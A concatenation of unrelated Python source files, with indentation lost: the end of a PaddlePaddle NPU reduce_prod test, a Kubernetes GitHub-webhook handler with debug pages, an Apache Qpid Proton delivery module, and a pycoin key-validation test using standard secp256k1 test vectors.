self.attrs = {'dim': [0], 'out_dtype': int(core.VarDesc.VarType.FP64)}
self.outputs = {
'Out': self.inputs['X'].prod(
axis=tuple(self.attrs['dim'])).astype(np.float64)
}
@skip_check_grad_ci(reason="right now not implement grad op")
class TestNPUReduceProdWithOutDtype_fp32_2(TestNPUReduceProd):
def setUp(self):
self.op_type = "reduce_prod"
self.set_npu()
self.init_dtype()
self.inputs = {'X': np.random.random((5, 6, 10)).astype(self.dtype)}
self.attrs = {'dim': [0], 'out_dtype': int(core.VarDesc.VarType.FP32)}
self.outputs = {
'Out': self.inputs['X'].prod(
axis=tuple(self.attrs['dim'])).astype(np.float32)
}
def init_dtype(self):
self.dtype = np.float16
if __name__ == '__main__':
unittest.main()
| |
# Copyright 2016 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cgi
import datetime
import hashlib
import hmac
import logging
import json
import traceback
import webapp2
from webapp2_extras import security
from google.appengine.api.runtime import memory_usage
from google.appengine.datastore import datastore_query
import classifier
import models
try:
WEBHOOK_SECRET = open('webhook_secret').read().strip()
except IOError:
logging.warning('unable to load webhook secret')
WEBHOOK_SECRET = 'default'
def make_signature(body):
hmac_instance = hmac.HMAC(WEBHOOK_SECRET, body, hashlib.sha1)
return 'sha1=' + hmac_instance.hexdigest()
class GithubHandler(webapp2.RequestHandler):
'''
Handle POSTs delivered using GitHub's webhook interface. Posts are
authenticated with HMAC signatures and a shared secret.
Each event is saved to a database, and can trigger additional
processing.
'''
def post(self):
event = self.request.headers.get('x-github-event')
signature = self.request.headers.get('x-hub-signature', '')
body = self.request.body
expected_signature = make_signature(body)
if not security.compare_hashes(signature, expected_signature):
logging.error('webhook failed signature check')
self.abort(400)
body_json = json.loads(body)
repo = body_json.get('repository', {}).get('full_name')
number = None
if 'pull_request' in body_json:
number = body_json['pull_request']['number']
elif 'issue' in body_json:
number = body_json['issue']['number']
parent = None
if number:
parent = models.GithubResource.make_key(repo, number)
kwargs = {}
timestamp = self.request.headers.get('x-timestamp')
if timestamp is not None:
kwargs['timestamp'] = datetime.datetime.strptime(
timestamp, '%Y-%m-%d %H:%M:%S.%f')
webhook = models.GithubWebhookRaw(
parent=parent,
repo=repo, number=number, event=event, body=body, **kwargs)
webhook.put()
if event == 'status':
status = models.GHStatus.from_json(body_json)
models.save_if_newer(status)
query = models.GHIssueDigest.find_head(repo, status.sha)
for issue in query.fetch():
update_issue_digest(issue.repo, issue.number)
if number is not None:
update_issue_digest(repo, number)
def update_issue_digest(repo, number, always_put=False):
digest = models.GHIssueDigest.make(repo, number,
*classifier.classify_issue(repo, number))
if always_put:
digest.put()
else:
models.save_if_newer(digest)
class BaseHandler(webapp2.RequestHandler):
def dispatch(self):
# Eh, this is less work than making all the debug pages escape properly.
# No resources allowed except for inline CSS, no iframing of content.
self.response.headers['Content-Security-Policy'] = \
"default-src none; style-src 'unsafe-inline'; frame-ancestors none"
super(BaseHandler, self).dispatch()
class Events(BaseHandler):
'''
Perform input/output on a series of webhook events from the datastore, for
debugging purposes.
'''
def get(self):
cursor = datastore_query.Cursor(urlsafe=self.request.get('cursor'))
repo = self.request.get('repo')
number = int(self.request.get('number', 0)) or None
count = int(self.request.get('count', 500))
if repo is not None and number is not None:
q = models.GithubWebhookRaw.query(
models.GithubWebhookRaw.repo == repo,
models.GithubWebhookRaw.number == number)
else:
q = models.GithubWebhookRaw.query()
q = q.order(models.GithubWebhookRaw.timestamp)
events, next_cursor, more = q.fetch_page(count, start_cursor=cursor)
out = []
for event in events:
out.append({'repo': event.repo, 'event': event.event,
'timestamp': str(event.timestamp),
'body': json.loads(event.body)})
resp = {'next': more and next_cursor.urlsafe(), 'calls': out}
self.response.headers['content-type'] = 'text/json'
self.response.write(json.dumps(resp, indent=4, sort_keys=True))
class Status(BaseHandler):
def get(self):
repo = self.request.get('repo')
sha = self.request.get('sha')
if not repo or not sha:
self.abort(403)
return
results = models.GHStatus.query_for_sha(repo, sha)
self.response.write('<table>')
for res in results:
self.response.write('<tr><td>%s<td>%s<td><a href="%s">%s</a>\n' %
(res.context, res.state, res.target_url, res.description))
class Timeline(BaseHandler):
'''
Render all the information in the datastore about a particular issue.
This is used for debugging and investigations.
'''
def emit_classified(self, repo, number):
try:
self.response.write('<h3>Classifier Output</h3>')
ret = classifier.classify_issue(repo, number)
self.response.write('<ul><li>pr: %s<li>open: %s<li>involved: %s'
% tuple(ret[:3]))
self.response.write('<li>last_event_timestamp: %s' % ret[4])
self.response.write('<li>payload len: %d' %len(json.dumps(ret[3])))
self.response.write('<pre>%s</pre></ul>' % cgi.escape(
json.dumps(ret[3], indent=2, sort_keys=True)))
except BaseException:
self.response.write('<pre>%s</pre>' % traceback.format_exc())
def emit_events(self, repo, number):
ancestor = models.GithubResource.make_key(repo, number)
events = list(models.GithubWebhookRaw.query(ancestor=ancestor))
events.sort(key=lambda e: e.timestamp)
self.response.write('<h3>Distilled Events</h3>')
self.response.write('<pre>')
event_pairs = [event.to_tuple() for event in events]
for ev in classifier.distill_events(event_pairs):
self.response.write(cgi.escape('%s, %s %s\n' % ev))
self.response.write('</pre>')
self.response.write('<h3>%d Raw Events</h3>' % (len(events)))
self.response.write('<table border=2>')
merged = {}
for event in events:
body_json = json.loads(event.body)
models.shrink(body_json)
if 'issue' in body_json:
merged.update(body_json['issue'])
elif 'pull_request' in body_json:
merged.update(body_json['pull_request'])
body = json.dumps(body_json, indent=2)
action = body_json.get('action')
sender = body_json.get('sender', {}).get('login')
self.response.write('<tr><td>%s\n' % '<td>'.join(str(x) for x in
[event.timestamp, event.event, action, sender,
'<pre>' + cgi.escape(body)]))
return merged
def get(self):
repo = self.request.get('repo')
number = self.request.get('number')
if self.request.get('format') == 'json':
ancestor = models.GithubResource.make_key(repo, number)
events = list(models.GithubWebhookRaw.query(ancestor=ancestor))
self.response.headers['content-type'] = 'application/json'
self.response.write(json.dumps([e.body for e in events], indent=True))
return
self.response.write(
'<style>td pre{max-height:200px;overflow:scroll}</style>')
self.response.write('<p>Memory: %s' % memory_usage().current())
self.emit_classified(repo, number)
self.response.write('<p>Memory: %s' % memory_usage().current())
if self.request.get('classify_only'):
return
merged = self.emit_events(repo, number)
self.response.write('<p>Memory: %s' % memory_usage().current())
if 'head' in merged:
sha = merged['head']['sha']
results = models.GHStatus.query_for_sha(repo, sha)
self.response.write('</table><table>')
for res in results:
self.response.write('<tr><td>%s<td>%s<td><a href="%s">%s</a>\n'
% (res.context, res.state, res.target_url, res.description))
models.shrink(merged)
self.response.write('</table><pre>%s</pre>' % cgi.escape(
json.dumps(merged, indent=2, sort_keys=True)))
self.response.write('<p>Memory: %s' % memory_usage().current())
| |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from cproton import PN_ACCEPTED, PN_MODIFIED, PN_RECEIVED, PN_REJECTED, PN_RELEASED, pn_delivery_abort, \
pn_delivery_aborted, pn_delivery_attachments, pn_delivery_link, pn_delivery_local, pn_delivery_local_state, \
pn_delivery_partial, pn_delivery_pending, pn_delivery_readable, pn_delivery_remote, pn_delivery_remote_state, \
pn_delivery_settle, pn_delivery_settled, pn_delivery_tag, pn_delivery_update, pn_delivery_updated, \
pn_delivery_writable, pn_disposition_annotations, pn_disposition_condition, pn_disposition_data, \
pn_disposition_get_section_number, pn_disposition_get_section_offset, pn_disposition_is_failed, \
pn_disposition_is_undeliverable, pn_disposition_set_failed, pn_disposition_set_section_number, \
pn_disposition_set_section_offset, pn_disposition_set_undeliverable, pn_disposition_type, pn_work_next
from ._condition import cond2obj, obj2cond
from ._data import dat2obj, obj2dat
from ._wrapper import Wrapper
class NamedInt(int):
values = {} # type: Dict[int, str] # noqa # TODO(PROTON-2323) typing.Dict is not available on Python 2.7
def __new__(cls, i, name):
ni = super(NamedInt, cls).__new__(cls, i)
cls.values[i] = ni
return ni
def __init__(self, i, name):
self.name = name
def __repr__(self):
return self.name
def __str__(self):
return self.name
@classmethod
def get(cls, i):
return cls.values.get(i, i)
class DispositionType(NamedInt):
values = {}
class Disposition(object):
"""
A delivery state.
Dispositions record the current state or final outcome of a
transfer. Every delivery contains both a local and remote
disposition. The local disposition holds the local state of the
delivery, and the remote disposition holds the last known remote
state of the delivery.
"""
RECEIVED = DispositionType(PN_RECEIVED, "RECEIVED")
"""
A non terminal state indicating how much (if any) message data
has been received for a delivery.
"""
ACCEPTED = DispositionType(PN_ACCEPTED, "ACCEPTED")
"""
A terminal state indicating that the delivery was successfully
processed. Once in this state there will be no further state
changes prior to the delivery being settled.
"""
REJECTED = DispositionType(PN_REJECTED, "REJECTED")
"""
A terminal state indicating that the delivery could not be
processed due to some error condition. Once in this state
there will be no further state changes prior to the delivery
being settled.
"""
RELEASED = DispositionType(PN_RELEASED, "RELEASED")
"""
A terminal state indicating that the delivery is being
returned to the sender. Once in this state there will be no
further state changes prior to the delivery being settled.
"""
MODIFIED = DispositionType(PN_MODIFIED, "MODIFIED")
"""
A terminal state indicating that the delivery is being
returned to the sender and should be annotated by the
sender prior to further delivery attempts. Once in this
state there will be no further state changes prior to the
delivery being settled.
"""
def __init__(self, impl, local):
self._impl = impl
self.local = local
self._data = None
self._condition = None
self._annotations = None
@property
def type(self):
"""
Get the type of this disposition object.
Defined values are:
* :const:`RECEIVED`
* :const:`ACCEPTED`
* :const:`REJECTED`
* :const:`RELEASED`
* :const:`MODIFIED`
:type: ``str``
"""
return DispositionType.get(pn_disposition_type(self._impl))
def _get_section_number(self):
return pn_disposition_get_section_number(self._impl)
def _set_section_number(self, n):
pn_disposition_set_section_number(self._impl, n)
section_number = property(_get_section_number, _set_section_number, doc="""
The section number associated with a disposition.
:type: ``int``
""")
def _get_section_offset(self):
return pn_disposition_get_section_offset(self._impl)
def _set_section_offset(self, n):
pn_disposition_set_section_offset(self._impl, n)
section_offset = property(_get_section_offset, _set_section_offset, doc="""
The section offset associated with a disposition.
:type: ``int``
""")
def _get_failed(self):
return pn_disposition_is_failed(self._impl)
def _set_failed(self, b):
pn_disposition_set_failed(self._impl, b)
failed = property(_get_failed, _set_failed, doc="""
The failed flag for this disposition.
:type: ``bool``
""")
def _get_undeliverable(self):
return pn_disposition_is_undeliverable(self._impl)
def _set_undeliverable(self, b):
pn_disposition_set_undeliverable(self._impl, b)
undeliverable = property(_get_undeliverable, _set_undeliverable, doc="""
The undeliverable flag for this disposition.
:type: ``bool``
""")
def _get_data(self):
if self.local:
return self._data
else:
return dat2obj(pn_disposition_data(self._impl))
def _set_data(self, obj):
if self.local:
self._data = obj
else:
raise AttributeError("data attribute is read-only")
data = property(_get_data, _set_data, doc="""
Access the disposition as a :class:`Data` object.
Dispositions are an extension point in the AMQP protocol. The
disposition interface provides setters/getters for those
dispositions that are predefined by the specification, however
access to the raw disposition data is provided so that other
dispositions can be used.
The :class:`Data` object returned by this operation is valid until
the parent delivery is settled.
:type: :class:`Data`
""")
def _get_annotations(self):
if self.local:
return self._annotations
else:
return dat2obj(pn_disposition_annotations(self._impl))
def _set_annotations(self, obj):
if self.local:
self._annotations = obj
else:
raise AttributeError("annotations attribute is read-only")
annotations = property(_get_annotations, _set_annotations, doc="""
The annotations associated with a disposition.
The :class:`Data` object retrieved by this operation may be modified
prior to updating a delivery. When a delivery is updated, the
annotations described by the :class:`Data` are reported to the peer
if applicable to the current delivery state, e.g. states such as
:const:`MODIFIED`. The :class:`Data` must be empty or contain a symbol
keyed map.
The :class:`Data` object returned by this operation is valid until
the parent delivery is settled.
:type: :class:`Data`
""")
def _get_condition(self):
if self.local:
return self._condition
else:
return cond2obj(pn_disposition_condition(self._impl))
def _set_condition(self, obj):
if self.local:
self._condition = obj
else:
raise AttributeError("condition attribute is read-only")
condition = property(_get_condition, _set_condition, doc="""
The condition object associated with a disposition.
The :class:`Condition` object retrieved by this operation may be
modified prior to updating a delivery. When a delivery is updated,
the condition described by the disposition is reported to the peer
if applicable to the current delivery state, e.g. states such as
:const:`REJECTED`.
:type: :class:`Condition`
""")
class Delivery(Wrapper):
"""
Tracks and/or records the delivery of a message over a link.
"""
RECEIVED = Disposition.RECEIVED
"""
A non terminal state indicating how much (if any) message data
has been received for a delivery.
"""
ACCEPTED = Disposition.ACCEPTED
"""
A terminal state indicating that the delivery was successfully
processed. Once in this state there will be no further state
changes prior to the delivery being settled.
"""
REJECTED = Disposition.REJECTED
"""
A terminal state indicating that the delivery could not be
processed due to some error condition. Once in this state
there will be no further state changes prior to the delivery
being settled.
"""
RELEASED = Disposition.RELEASED
"""
A terminal state indicating that the delivery is being
returned to the sender. Once in this state there will be no
further state changes prior to the delivery being settled.
"""
MODIFIED = Disposition.MODIFIED
"""
A terminal state indicating that the delivery is being
returned to the sender and should be annotated by the
sender prior to further delivery attempts. Once in this
state there will be no further state changes prior to the
delivery being settled.
"""
@staticmethod
def wrap(impl):
if impl is None:
return None
else:
return Delivery(impl)
def __init__(self, impl):
Wrapper.__init__(self, impl, pn_delivery_attachments)
def _init(self):
self.local = Disposition(pn_delivery_local(self._impl), True)
self.remote = Disposition(pn_delivery_remote(self._impl), False)
@property
def tag(self):
"""
The identifier for the delivery.
:type: ``bytes``
"""
return pn_delivery_tag(self._impl)
@property
def writable(self):
"""
``True`` for an outgoing delivery to which data can now be written,
``False`` otherwise..
:type: ``bool``
"""
return pn_delivery_writable(self._impl)
@property
def readable(self):
"""
``True`` for an incoming delivery that has data to read,
``False`` otherwise..
:type: ``bool``
"""
return pn_delivery_readable(self._impl)
@property
def updated(self):
"""
``True`` if the state of the delivery has been updated
(e.g. it has been settled and/or accepted, rejected etc),
``False`` otherwise.
:type: ``bool``
"""
return pn_delivery_updated(self._impl)
def update(self, state):
"""
Set the local state of the delivery e.g. :const:`ACCEPTED`,
:const:`REJECTED`, :const:`RELEASED`.
:param state: State of delivery
:type state: ``int``
"""
obj2dat(self.local._data, pn_disposition_data(self.local._impl))
obj2dat(self.local._annotations, pn_disposition_annotations(self.local._impl))
obj2cond(self.local._condition, pn_disposition_condition(self.local._impl))
pn_delivery_update(self._impl, state)
@property
def pending(self):
"""
The amount of pending message data for a delivery.
:type: ``int``
"""
return pn_delivery_pending(self._impl)
@property
def partial(self):
"""
``True`` for an incoming delivery if not all the data is
yet available, ``False`` otherwise.
:type: ``bool``
"""
return pn_delivery_partial(self._impl)
@property
def local_state(self):
"""
A string representation of the local state of the delivery.
:type: ``str``
"""
return DispositionType.get(pn_delivery_local_state(self._impl))
@property
def remote_state(self):
"""
A string representation of the state of the delivery as
indicated by the remote peer.
:type: ``str``
"""
return DispositionType.get(pn_delivery_remote_state(self._impl))
@property
def settled(self):
"""
``True`` if the delivery has been settled by the remote peer,
``False`` otherwise.
:type: ``bool``
"""
return pn_delivery_settled(self._impl)
def settle(self):
"""
Settles the delivery locally. This indicates the application
considers the delivery complete and does not wish to receive any
further events about it. Every delivery should be settled locally.
"""
pn_delivery_settle(self._impl)
@property
def aborted(self):
"""
``True`` if the delivery has been aborted, ``False`` otherwise.
:type: ``bool``
"""
return pn_delivery_aborted(self._impl)
def abort(self):
"""
Aborts the delivery. This indicates the application wishes to
invalidate any data that may have already been sent on this delivery.
The delivery cannot be aborted after it has been completely delivered.
"""
pn_delivery_abort(self._impl)
@property
def work_next(self):
"""Deprecated: use on_message(), on_accepted(), on_rejected(),
on_released(), and on_settled() instead.
The next :class:`Delivery` on the connection that has pending
operations.
:type: :class:`Delivery`
"""
return Delivery.wrap(pn_work_next(self._impl))
@property
def link(self):
"""
The :class:`Link` on which the delivery was sent or received.
:type: :class:`Link`
"""
from . import _endpoints
return _endpoints.Link.wrap(pn_delivery_link(self._impl))
@property
def session(self):
"""
The :class:`Session` over which the delivery was sent or received.
:type: :class:`Session`
"""
return self.link.session
@property
def connection(self):
"""
The :class:`Connection` over which the delivery was sent or received.
:type: :class:`Connection`
"""
return self.session.connection
@property
def transport(self):
"""
The :class:`Transport` bound to the :class:`Connection` over which
the delivery was sent or received.
:type: :class:`Transport`
"""
return self.connection.transport
| |
#!/usr/bin/env python
import unittest
from pycoin.ecdsa import generator_secp256k1
from pycoin.ecdsa.ellipticcurve import Point, NoSuchPointError
from pycoin.encoding import hash160_sec_to_bitcoin_address
from pycoin.key import Key
from pycoin.key.BIP32Node import BIP32Node
from pycoin.key.Key import InvalidPublicPairError, InvalidSecretExponentError
from pycoin.key.validate import is_address_valid, is_wif_valid, is_public_bip32_valid, is_private_bip32_valid
from pycoin.networks import pay_to_script_prefix_for_netcode, network_codes
def change_prefix(address, new_prefix):
return hash160_sec_to_bitcoin_address(Key.from_text(address).hash160(), address_prefix=new_prefix)
PAY_TO_HASH_ADDRESSES = ["1BgGZ9tcN4rm9KBzDn7KprQz87SZ26SAMH", "1EHNa6Q4Jz2uvNExL497mE43ikXhwF6kZm",
"1cMh228HTCiwS8ZsaakH8A8wze1JR5ZsP", "1LagHJk2FyCV2VzrNHVqg3gYG4TSYwDV4m",
"1CUNEBjYrCn2y1SdiUMohaKUi4wpP326Lb", "1NZUP3JAc9JkmbvmoTv7nVgZGtyJjirKV1"]
PAY_TO_SCRIPT_PREFIX = pay_to_script_prefix_for_netcode("BTC")
PAY_TO_SCRIPT_ADDRESSES = [change_prefix(t, PAY_TO_SCRIPT_PREFIX) for t in PAY_TO_HASH_ADDRESSES]
class KeyUtilsTest(unittest.TestCase):
def test_address_valid_btc(self):
for address in PAY_TO_HASH_ADDRESSES:
self.assertEqual(is_address_valid(address), "BTC")
a = address[:-1] + chr(ord(address[-1])+1)
self.assertEqual(is_address_valid(a), None)
for address in PAY_TO_HASH_ADDRESSES:
self.assertEqual(is_address_valid(address, allowable_types=["pay_to_script"]), None)
self.assertEqual(is_address_valid(address, allowable_types=["address"]), "BTC")
for address in PAY_TO_SCRIPT_ADDRESSES:
self.assertEqual(address[0], "3")
self.assertEqual(is_address_valid(address, allowable_types=["pay_to_script"]), "BTC")
self.assertEqual(is_address_valid(address, allowable_types=["address"]), None)
def test_is_wif_valid(self):
WIFS = ["KwDiBf89QgGbjEhKnhXJuH7LrciVrZi3qYjgd9M7rFU73sVHnoWn",
"5HpHagT65TZzG1PH3CSu63k8DbpvD8s5ip4nEB3kEsreAnchuDf",
"KwDiBf89QgGbjEhKnhXJuH7LrciVrZi3qYjgd9M7rFU74NMTptX4",
"5HpHagT65TZzG1PH3CSu63k8DbpvD8s5ip4nEB3kEsreAvUcVfH"]
for wif in WIFS:
self.assertEqual(is_wif_valid(wif), "BTC")
a = wif[:-1] + chr(ord(wif[-1])+1)
self.assertEqual(is_wif_valid(a), None)
NETWORK_NAMES = network_codes()
for netcode in NETWORK_NAMES:
for se in range(1, 10):
key = Key(secret_exponent=se, netcode=netcode)
for tv in [True, False]:
wif = key.wif(use_uncompressed=tv)
self.assertEqual(is_wif_valid(wif, allowable_netcodes=[netcode]), netcode)
a = wif[:-1] + chr(ord(wif[-1])+1)
self.assertEqual(is_wif_valid(a, allowable_netcodes=[netcode]), None)
def test_is_public_private_bip32_valid(self):
NETWORK_NAMES = network_codes()
WALLET_KEYS = ["foo", "1", "2", "3", "4", "5"]
# not all networks support BIP32 yet
for netcode in "BTC XTN DOGE".split():
for wk in WALLET_KEYS:
wallet = BIP32Node.from_master_secret(wk.encode("utf8"), netcode=netcode)
text = wallet.wallet_key(as_private=True)
self.assertEqual(is_private_bip32_valid(text, allowable_netcodes=NETWORK_NAMES), netcode)
self.assertEqual(is_public_bip32_valid(text, allowable_netcodes=NETWORK_NAMES), None)
a = text[:-1] + chr(ord(text[-1])+1)
self.assertEqual(is_private_bip32_valid(a, allowable_netcodes=NETWORK_NAMES), None)
self.assertEqual(is_public_bip32_valid(a, allowable_netcodes=NETWORK_NAMES), None)
text = wallet.wallet_key(as_private=False)
self.assertEqual(is_private_bip32_valid(text, allowable_netcodes=NETWORK_NAMES), None)
self.assertEqual(is_public_bip32_valid(text, allowable_netcodes=NETWORK_NAMES), netcode)
a = text[:-1] + chr(ord(text[-1])+1)
self.assertEqual(is_private_bip32_valid(a, allowable_netcodes=NETWORK_NAMES), None)
self.assertEqual(is_public_bip32_valid(a, allowable_netcodes=NETWORK_NAMES), None)
def test_key_limits(self):
nc = 'BTC'
cc = b'000102030405060708090a0b0c0d0e0f'
order = generator_secp256k1.order()
for k in -1, 0, order, order + 1:
self.assertRaises(InvalidSecretExponentError, Key, secret_exponent=k)
self.assertRaises(InvalidSecretExponentError, BIP32Node, nc, cc, secret_exponent=k)
for i in range(1, 512):
Key(secret_exponent=i)
BIP32Node(nc, cc, secret_exponent=i)
def test_points(self):
secp256k1_curve = generator_secp256k1.curve()
# From <https://crypto.stackexchange.com/questions/784/are-there-any-secp256k1-ecdsa-test-examples-available>
test_points = []
k = 1
x = 0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798
y = 0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8
test_points.append((k, x, y))
k = 2
x = 0xC6047F9441ED7D6D3045406E95C07CD85C778E4B8CEF3CA7ABAC09B95C709EE5
y = 0x1AE168FEA63DC339A3C58419466CEAEEF7F632653266D0E1236431A950CFE52A
test_points.append((k, x, y))
k = 3
x = 0xF9308A019258C31049344F85F89D5229B531C845836F99B08601F113BCE036F9
y = 0x388F7B0F632DE8140FE337E62A37F3566500A99934C2231B6CB9FD7584B8E672
test_points.append((k, x, y))
k = 4
x = 0xE493DBF1C10D80F3581E4904930B1404CC6C13900EE0758474FA94ABE8C4CD13
y = 0x51ED993EA0D455B75642E2098EA51448D967AE33BFBDFE40CFE97BDC47739922
test_points.append((k, x, y))
k = 5
x = 0x2F8BDE4D1A07209355B4A7250A5C5128E88B84BDDC619AB7CBA8D569B240EFE4
y = 0xD8AC222636E5E3D6D4DBA9DDA6C9C426F788271BAB0D6840DCA87D3AA6AC62D6
test_points.append((k, x, y))
k = 6
x = 0xFFF97BD5755EEEA420453A14355235D382F6472F8568A18B2F057A1460297556
y = 0xAE12777AACFBB620F3BE96017F45C560DE80F0F6518FE4A03C870C36B075F297
test_points.append((k, x, y))
k = 7
x = 0x5CBDF0646E5DB4EAA398F365F2EA7A0E3D419B7E0330E39CE92BDDEDCAC4F9BC
y = 0x6AEBCA40BA255960A3178D6D861A54DBA813D0B813FDE7B5A5082628087264DA
test_points.append((k, x, y))
k = 8
x = 0x2F01E5E15CCA351DAFF3843FB70F3C2F0A1BDD05E5AF888A67784EF3E10A2A01
y = 0x5C4DA8A741539949293D082A132D13B4C2E213D6BA5B7617B5DA2CB76CBDE904
test_points.append((k, x, y))
k = 9
x = 0xACD484E2F0C7F65309AD178A9F559ABDE09796974C57E714C35F110DFC27CCBE
y = 0xCC338921B0A7D9FD64380971763B61E9ADD888A4375F8E0F05CC262AC64F9C37
test_points.append((k, x, y))
k = 10
x = 0xA0434D9E47F3C86235477C7B1AE6AE5D3442D49B1943C2B752A68E2A47E247C7
y = 0x893ABA425419BC27A3B6C7E693A24C696F794C2ED877A1593CBEE53B037368D7
test_points.append((k, x, y))
k = 11
x = 0x774AE7F858A9411E5EF4246B70C65AAC5649980BE5C17891BBEC17895DA008CB
y = 0xD984A032EB6B5E190243DD56D7B7B365372DB1E2DFF9D6A8301D74C9C953C61B
test_points.append((k, x, y))
k = 12
x = 0xD01115D548E7561B15C38F004D734633687CF4419620095BC5B0F47070AFE85A
y = 0xA9F34FFDC815E0D7A8B64537E17BD81579238C5DD9A86D526B051B13F4062327
test_points.append((k, x, y))
k = 13
x = 0xF28773C2D975288BC7D1D205C3748651B075FBC6610E58CDDEEDDF8F19405AA8
y = 0x0AB0902E8D880A89758212EB65CDAF473A1A06DA521FA91F29B5CB52DB03ED81
test_points.append((k, x, y))
k = 14
x = 0x499FDF9E895E719CFD64E67F07D38E3226AA7B63678949E6E49B241A60E823E4
y = 0xCAC2F6C4B54E855190F044E4A7B3D464464279C27A3F95BCC65F40D403A13F5B
test_points.append((k, x, y))
k = 15
x = 0xD7924D4F7D43EA965A465AE3095FF41131E5946F3C85F79E44ADBCF8E27E080E
y = 0x581E2872A86C72A683842EC228CC6DEFEA40AF2BD896D3A5C504DC9FF6A26B58
test_points.append((k, x, y))
k = 16
x = 0xE60FCE93B59E9EC53011AABC21C23E97B2A31369B87A5AE9C44EE89E2A6DEC0A
y = 0xF7E3507399E595929DB99F34F57937101296891E44D23F0BE1F32CCE69616821
test_points.append((k, x, y))
k = 17
x = 0xDEFDEA4CDB677750A420FEE807EACF21EB9898AE79B9768766E4FAA04A2D4A34
y = 0x4211AB0694635168E997B0EAD2A93DAECED1F4A04A95C0F6CFB199F69E56EB77
test_points.append((k, x, y))
k = 18
x = 0x5601570CB47F238D2B0286DB4A990FA0F3BA28D1A319F5E7CF55C2A2444DA7CC
y = 0xC136C1DC0CBEB930E9E298043589351D81D8E0BC736AE2A1F5192E5E8B061D58
test_points.append((k, x, y))
k = 19
x = 0x2B4EA0A797A443D293EF5CFF444F4979F06ACFEBD7E86D277475656138385B6C
y = 0x85E89BC037945D93B343083B5A1C86131A01F60C50269763B570C854E5C09B7A
test_points.append((k, x, y))
k = 20
x = 0x4CE119C96E2FA357200B559B2F7DD5A5F02D5290AFF74B03F3E471B273211C97
y = 0x12BA26DCB10EC1625DA61FA10A844C676162948271D96967450288EE9233DC3A
test_points.append((k, x, y))
k = 112233445566778899
x = 0xA90CC3D3F3E146DAADFC74CA1372207CB4B725AE708CEF713A98EDD73D99EF29
y = 0x5A79D6B289610C68BC3B47F3D72F9788A26A06868B4D8E433E1E2AD76FB7DC76
test_points.append((k, x, y))
k = 112233445566778899112233445566778899
x = 0xE5A2636BCFD412EBF36EC45B19BFB68A1BC5F8632E678132B885F7DF99C5E9B3
y = 0x736C1CE161AE27B405CAFD2A7520370153C2C861AC51D6C1D5985D9606B45F39
test_points.append((k, x, y))
k = 28948022309329048855892746252171976963209391069768726095651290785379540373584
x = 0xA6B594B38FB3E77C6EDF78161FADE2041F4E09FD8497DB776E546C41567FEB3C
y = 0x71444009192228730CD8237A490FEBA2AFE3D27D7CC1136BC97E439D13330D55
test_points.append((k, x, y))
k = 57896044618658097711785492504343953926418782139537452191302581570759080747168
x = 0x00000000000000000000003B78CE563F89A0ED9414F5AA28AD0D96D6795F9C63
y = 0x3F3979BF72AE8202983DC989AEC7F2FF2ED91BDD69CE02FC0700CA100E59DDF3
test_points.append((k, x, y))
k = 86844066927987146567678238756515930889628173209306178286953872356138621120752
x = 0xE24CE4BEEE294AA6350FAA67512B99D388693AE4E7F53D19882A6EA169FC1CE1
y = 0x8B71E83545FC2B5872589F99D948C03108D36797C4DE363EBD3FF6A9E1A95B10
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494317
x = 0x4CE119C96E2FA357200B559B2F7DD5A5F02D5290AFF74B03F3E471B273211C97
y = 0xED45D9234EF13E9DA259E05EF57BB3989E9D6B7D8E269698BAFD77106DCC1FF5
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494318
x = 0x2B4EA0A797A443D293EF5CFF444F4979F06ACFEBD7E86D277475656138385B6C
y = 0x7A17643FC86BA26C4CBCF7C4A5E379ECE5FE09F3AFD9689C4A8F37AA1A3F60B5
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494319
x = 0x5601570CB47F238D2B0286DB4A990FA0F3BA28D1A319F5E7CF55C2A2444DA7CC
y = 0x3EC93E23F34146CF161D67FBCA76CAE27E271F438C951D5E0AE6D1A074F9DED7
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494320
x = 0xDEFDEA4CDB677750A420FEE807EACF21EB9898AE79B9768766E4FAA04A2D4A34
y = 0xBDEE54F96B9CAE9716684F152D56C251312E0B5FB56A3F09304E660861A910B8
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494321
x = 0xE60FCE93B59E9EC53011AABC21C23E97B2A31369B87A5AE9C44EE89E2A6DEC0A
y = 0x081CAF8C661A6A6D624660CB0A86C8EFED6976E1BB2DC0F41E0CD330969E940E
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494322
x = 0xD7924D4F7D43EA965A465AE3095FF41131E5946F3C85F79E44ADBCF8E27E080E
y = 0xA7E1D78D57938D597C7BD13DD733921015BF50D427692C5A3AFB235F095D90D7
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494323
x = 0x499FDF9E895E719CFD64E67F07D38E3226AA7B63678949E6E49B241A60E823E4
y = 0x353D093B4AB17AAE6F0FBB1B584C2B9BB9BD863D85C06A4339A0BF2AFC5EBCD4
test_points.append((k, x, y))
k = 115792089237316195423570985008687907852837564279074904382605163141518161494324
x = 0xF28773C2D975288BC7D1D205C3748651B075FBC6610E58CDDEEDDF8F19405AA8
y = 0xF54F6FD17277F5768A7DED149A3250B8C5E5F925ADE056E0D64A34AC24FC0EAE
test_points.append((k, x, y))
